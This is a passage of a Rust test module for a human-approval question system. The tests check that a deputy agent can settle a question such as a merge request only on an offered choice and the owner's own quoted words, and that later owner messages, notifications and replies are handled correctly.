2854 assert!(
2855 q.settle_by_deputy("deputy-x", "merge", "erge").is_err(),
2856 "a fragment is not the word"
2857 );
2858 q.settle_by_deputy("deputy-x", "merge", "Merge").unwrap();
2859 assert_eq!(q.resolution().as_deref(), Some("merge"));
2860 }
2861
2862 #[test]
2863 fn a_clear_merge_among_other_requests_settles_but_a_hedge_does_not() {
2864 let mut q = Question::new(
2865 "run".into(),
2866 crate::land::APPROVAL_NODE.into(),
2867 "land".into(),
2868 "Merge?".into(),
2869 String::new(),
2870 vec!["merge".into(), "hold".into()],
2871 );
2872 let mut dep = Deputy::new("brief".into());
2873 dep.seat = Some(crate::agent::SeatState::new("deputy-x", "alpha", 1));
2874 q.deputy = Some(dep);
2875 q.say("たぶんマージでいい。残りの指摘はフォローアップに積んで")
2876 .unwrap();
2877 assert!(
2878 q.settle_by_deputy("deputy-x", "merge", "たぶんマージでいい")
2879 .is_err()
2880 );
2881 q.reply("merge?", vec!["merge".into(), "hold".into()])
2882 .unwrap();
2883 q.say("マージしていいよ。残りのレビュー指摘はフォローアップタスクとして積んで")
2884 .unwrap();
2885 assert!(
2886 q.settle_by_deputy("deputy-x", "merge", "どこかの言葉")
2887 .is_err(),
2888 "the quote must be the owner's"
2889 );
2890 assert!(
2891 q.settle_by_deputy("deputy-x", "hold", "マージしていいよ")
2892 .is_err(),
2893 "`hold` still needs the whole message"
2894 );
2895 q.settle_by_deputy("deputy-x", "merge", "マージしていいよ")
2896 .unwrap();
2897 assert_eq!(q.resolution().as_deref(), Some("merge"));
2898 }
2899
2900 #[test]
2901 fn a_later_owner_message_supersedes_an_earlier_merge() {
2902 let mut q = Question::new(
2903 "run".into(),
2904 crate::land::APPROVAL_NODE.into(),
2905 "land".into(),
2906 "Merge?".into(),
2907 String::new(),
2908 vec!["merge".into(), "hold".into()],
2909 );
2910 let mut dep = Deputy::new("brief".into());
2911 dep.seat = Some(crate::agent::SeatState::new("deputy-x", "alpha", 1));
2912 q.deputy = Some(dep);
2913 q.say("merge").unwrap();
2914 q.reply("sure?", vec!["merge".into(), "hold".into()])
2915 .unwrap();
2916 q.say("wait, don't merge").unwrap();
2917 assert!(q.settle_by_deputy("deputy-x", "merge", "merge").is_err());
2918 assert_eq!(q.status, QuestionStatus::Open);
2919 }
2920
2921 #[test]
2922 fn a_deputy_settles_only_on_an_offered_choice_and_the_owners_own_words() {
2923 let mut q = Question::new(
2924 "task".to_owned(),
2925 "conduct".to_owned(),
2926 "conduct".to_owned(),
2927 "Done?".to_owned(),
2928 String::new(),
2929 vec!["yes".to_owned(), "no".to_owned()],
2930 );
2931 let mut seat = crate::agent::SeatState::new("deputy-x", "alpha", 1);
2932 seat.turns = 1;
2933 let mut dep = Deputy::new("brief".to_owned());
2934 dep.seat = Some(seat);
2935 q.deputy = Some(dep);
2936 q.say("setup done, go ahead").unwrap();
2937
2938 assert!(
2939 q.settle_by_deputy("someone-else", "yes", "setup done")
2940 .is_err()
2941 );
2942 assert!(
2943 q.settle_by_deputy("deputy-x", "maybe", "setup done")
2944 .is_err()
2945 );
2946 assert!(
2947 q.settle_by_deputy("deputy-x", "yes", "never said this")
2948 .is_err()
2949 );
2950 assert!(q.settle_by_deputy("deputy-x", "yes", " ").is_err());
2951 assert_eq!(q.status, QuestionStatus::Open);
2952
2953 q.settle_by_deputy("deputy-x", "yes", "setup done").unwrap();
2954 assert_eq!(q.status, QuestionStatus::Answered);
2955 assert_eq!(q.resolution().as_deref(), Some("yes"));
2956 let last = q.thread.last().unwrap();
2957 assert_eq!(last.who, Who::Agent);
2958 assert!(
2959 last.body.contains("setup done"),
2960 "the quote stays on the record"
2961 );
2962 }
2963
2964 #[test]
2965 fn a_question_written_before_deputies_still_reads() {
2966 let mut q = Question::new(
2967 "task".to_owned(),
2968 "conduct".to_owned(),
2969 "conduct".to_owned(),
2970 "Done?".to_owned(),
2971 String::new(),
2972 Vec::new(),
2973 );
2974 q.schema = 4;
2975 let mut v = serde_json::to_value(&q).unwrap();
2976 v.as_object_mut().unwrap().remove("deputy");
2977 let back: Question = serde_json::from_value(v).unwrap();
2978 assert!(back.deputy.is_none());
2979 }
2980
2981 #[test]
2982 fn saying_something_appends_an_operator_turn_without_deciding_anything() {
2983 let mut q = choice_question();
2984 q.say("does the cache need eviction?").unwrap();
2985 assert_eq!(q.thread.len(), 1);
2986 assert_eq!(q.thread[0].who, Who::Operator);
2987 assert_eq!(q.thread[0].body, "does the cache need eviction?");
2988 assert_eq!(q.status, QuestionStatus::Open);
2991 assert!(q.answer.is_none());
2992 assert!(q.waiting_on_agent(), "the ball is now in the agent's court");
2993 }
2994
2995 #[test]
2996 fn saying_and_replying_are_refused_on_a_settled_question_and_on_empty_text() {
2997 let mut answered = choice_question();
2998 answered
2999 .answer(Answer::Choice("SQLite".to_owned()))
3000 .unwrap();
3001 let a = answered.say("still there?").unwrap_err().to_string();
3002 assert!(a.contains("already answered"), "{a}");
3003 let b = answered
3004 .reply("still there?", vec![])
3005 .unwrap_err()
3006 .to_string();
3007 assert!(b.contains("already answered"), "{b}");
3008
3009 let mut abandoned = choice_question();
3010 abandoned.abandon("timed out");
3011 let c = abandoned.say("hello?").unwrap_err().to_string();
3012 assert!(c.contains("abandoned"), "{c}");
3013
3014 let mut open = choice_question();
3015 let d = open.say(" ").unwrap_err().to_string();
3016 assert!(d.contains("empty"), "{d}");
3017 let e = open.reply(" \n", vec![]).unwrap_err().to_string();
3018 assert!(e.contains("empty"), "{e}");
3019 assert!(open.thread.is_empty(), "a refused turn leaves no trace");
3020 }
3021
3022 #[test]
3023 fn a_reply_replaces_the_choices_and_moves_the_ball_back_to_the_owner() {
3024 let mut q = choice_question();
3025 q.say("SQLite or Redis, but what about disk space?")
3026 .unwrap();
3027 assert!(q.waiting_on_agent());
3028
3029 q.reply(
3030 "SQLite: it is one file, no server to run.",
3031 vec!["SQLite".to_owned()],
3032 )
3033 .unwrap();
3034
3035 assert_eq!(q.choices, ["SQLite"]);
3036 assert!(
3037 !q.waiting_on_agent(),
3038 "the agent spoke, so the owner is the one being waited on now"
3039 );
3040 assert_eq!(q.thread.len(), 2);
3041 assert_eq!(q.thread[1].who, Who::Agent);
3042
3043 assert!(q.answer(Answer::Choice("Redis".to_owned())).is_err());
3045 q.answer(Answer::Choice("SQLite".to_owned())).unwrap();
3046 assert_eq!(q.resolution().as_deref(), Some("SQLite"));
3047 }
3048
3049 #[test]
3050 fn notification_fires_for_the_first_ask_and_only_after_the_quiet_window_on_a_reply() {
3051 let mut fresh = choice_question();
3052 assert!(
3053 fresh.should_notify(Timestamp::now()),
3054 "nobody has been notified yet, so the first ask always pages"
3055 );
3056
3057 fresh.say("why not Postgres?").unwrap();
3058 let just_said = fresh.thread[0].at;
3059 assert!(
3060 !fresh.should_notify(just_said + jiff::SignedDuration::from_secs(60)),
3061 "still on the screen a minute later; no need to page again"
3062 );
3063 assert!(
3064 !fresh.should_notify(just_said + jiff::SignedDuration::from_secs(300)),
3065 "exactly the window: `>` means this side stays quiet"
3066 );
3067 assert!(
3068 fresh.should_notify(just_said + jiff::SignedDuration::from_secs(301)),
3069 "past the window: they may have walked away"
3070 );
3071 }
3072
3073 #[test]
3074 fn a_round_trip_of_turns_still_counts_as_one_open_question() {
3075 let (_dir, s) = store();
3076 let mut q = choice_question();
3077 s.put(&mut q).unwrap();
3078 q.say("why not Postgres?").unwrap();
3079 s.put(&mut q).unwrap();
3080 q.reply("no server to run", vec!["SQLite".to_owned()])
3081 .unwrap();
3082 s.put(&mut q).unwrap();
3083
3084 assert_eq!(
3085 s.count_open(),
3086 1,
3087 "one question that talked twice is still one open question"
3088 );
3089 assert_eq!(s.open_for(&q.run).len(), 1);
3090 }
3091
3092 #[tokio::test]
3093 async fn the_wait_returns_to_the_caller_when_the_owner_talks_back_without_deciding() {
3094 let (dir, s) = store();
3095 let mut q = choice_question();
3096 let id = q.id.clone();
3097 let writer = Questions::at(dir.path().join("questions"));
3098 let handle = tokio::spawn(async move {
3099 tokio::time::sleep(Duration::from_millis(30)).await;
3100 let mut fresh = writer.get(&id).expect("the question was filed first");
3101 fresh.say("why not Postgres?").unwrap();
3102 writer.put(&mut fresh).unwrap();
3103 });
3104
3105 let got = wait_for_owner(
3106 &mut q,
3107 &s,
3108 &quiet(),
3109 Duration::from_secs(5),
3110 Duration::from_millis(10),
3111 )
3112 .await
3113 .unwrap();
3114
3115 handle.await.unwrap();
3116 assert_eq!(got, Wait::Replied("why not Postgres?".to_owned()));
3117 assert_eq!(
3118 q.status,
3119 QuestionStatus::Open,
3120 "talking back is not a decision; the question stays open"
3121 );
3122 assert!(q.answer.is_none());
3123 }
3124
3125 #[test]
3126 fn a_say_that_lands_before_the_agents_reply_stays_unread() {
3127 let mut q = choice_question();
3128 q.say("A").unwrap();
3129 q.delivered_turns = q.thread.len();
3130 q.say("B").unwrap();
3131 q.reply("about A", vec![]).unwrap();
3132 assert_eq!(q.unread_from_owner().as_deref(), Some("B"));
3133 q.delivered_turns = q.thread.len();
3134 assert_eq!(q.unread_from_owner(), None);
3135 }
3136
3137 #[test]
3138 fn a_say_before_the_answer_is_handed_over_ahead_of_it() {
3139 let (_d, s) = store();
3140 let mut q = choice_question();
3141 s.put(&mut q).unwrap();
3142 q.say("first").unwrap();
3143 q.say("second").unwrap();
3144 q.answer(Answer::Choice("SQLite".to_owned())).unwrap();
3145 s.put(&mut q).unwrap();
3146 assert_eq!(q.unread_from_owner(), None, "closed: the guard stays");
3147 let mut out = Vec::new();
3148 deliver_answer(&s, &mut q, "SQLite", &mut out).unwrap();
3149 let shown = String::from_utf8(out).unwrap();
3150 let (a, b, c) = (
3151 shown.find("first").unwrap(),
3152 shown.find("second").unwrap(),
3153 shown.find("SQLite").unwrap(),
3154 );
3155 assert!(a < b && b < c, "{shown}");
3156 assert_eq!(q.delivered_turns, q.thread.len());
3157 assert!(q.answer_delivered);
3158 }
3159
3160 #[test]
3161 fn an_answer_alone_is_unchanged_and_delivered_says_are_not_repeated() {
3162 let mut q = choice_question();
3163 q.answer(Answer::Choice("SQLite".to_owned())).unwrap();
3164 assert_eq!(answer_for_agent(&q, "SQLite"), "SQLite");
3165 let mut q = choice_question();
3166 q.say("old").unwrap();
3167 q.delivered_turns = q.thread.len();
3168 q.say("new").unwrap();
3169 q.answer(Answer::Choice("SQLite".to_owned())).unwrap();
3170 let shown = answer_for_agent(&q, "SQLite");
3171 assert!(shown.contains("new") && !shown.contains("old"), "{shown}");
3172 }
3173
3174 #[test]
3175 fn action_specs_parse_strictly_and_must_name_an_offered_choice() {
3176 let choices = vec!["resume で続行する".to_owned(), "wait".to_owned()];
3177 let ok = parse_actions(
3178 &[
3179 "resume で続行する=resume".to_owned(),
3180 "wait=done".to_owned(),
3181 ],
3182 &choices,
3183 "run-1",
3184 )
3185 .unwrap();
3186 assert_eq!(
3187 ok["resume で続行する"],
3188 ChoiceAction::Resume {
3189 run: "run-1".into()
3190 }
3191 );
3192 assert_eq!(ok["wait"], ChoiceAction::Done);
3193
3194 let named = ChoiceAction::parse("x=resume:abcd", "").unwrap();
3195 assert_eq!(named.1, ChoiceAction::Resume { run: "abcd".into() });
3196 assert_eq!(
3197 ChoiceAction::parse("x=requeue", "").unwrap().1,
3198 ChoiceAction::Requeue
3199 );
3200
3201 for bad in [
3202 "no-equals",
3203 "=done",
3204 "x=resume",
3205 "x=resume:",
3206 "x=explode",
3207 "x=done:1",
3208 ] {
3209 assert!(ChoiceAction::parse(bad, "").is_err(), "{bad}");
3210 }
3211 assert!(parse_actions(&["ghost=done".to_owned()], &choices, "").is_err());
3212 assert!(
3213 parse_actions(
3214 &["wait=done".to_owned(), "wait=requeue".to_owned()],
3215 &choices,
3216 ""
3217 )
3218 .is_err()
3219 );
3220 }
3221
3222 #[test]
3223 fn only_a_chosen_label_with_an_action_is_actionable() {
3224 let mut q = choice_question();
3225 q.choices = vec!["resume".to_owned(), "SQLite".to_owned()];
3226 q.actions.insert("SQLite".to_owned(), ChoiceAction::Requeue);
3227 assert!(q.chosen_action().is_none(), "unanswered");
3228 q.answer(Answer::Choice("resume".to_owned())).unwrap();
3229 assert!(
3230 q.chosen_action().is_none(),
3231 "a label that merely reads like an action does nothing"
3232 );
3233
3234 let mut q2 = choice_question();
3235 q2.choices = vec!["SQLite".to_owned()];
3236 q2.actions
3237 .insert("SQLite".to_owned(), ChoiceAction::Requeue);
3238 q2.answer(Answer::Choice("SQLite".to_owned())).unwrap();
3239 assert_eq!(q2.chosen_action(), Some(&ChoiceAction::Requeue));
3240 }
3241
3242 #[test]
3243 fn a_reply_drops_actions_whose_choice_is_gone_and_old_files_read_without_actions() {
3244 let mut q = choice_question();
3245 q.choices = vec!["A".to_owned(), "B".to_owned()];
3246 q.actions.insert("A".to_owned(), ChoiceAction::Done);
3247 q.actions.insert("B".to_owned(), ChoiceAction::Requeue);
3248 q.reply("narrowing", vec!["B".to_owned()]).unwrap();
3249 assert_eq!(q.actions.len(), 1);
3250 assert!(q.actions.contains_key("B"));
3251
3252 let mut v = serde_json::to_value(&q).unwrap();
3253 v.as_object_mut().unwrap().remove("actions");
3254 let old: Question = serde_json::from_value(v).unwrap();
3255 assert!(old.actions.is_empty());
3256 }
3257}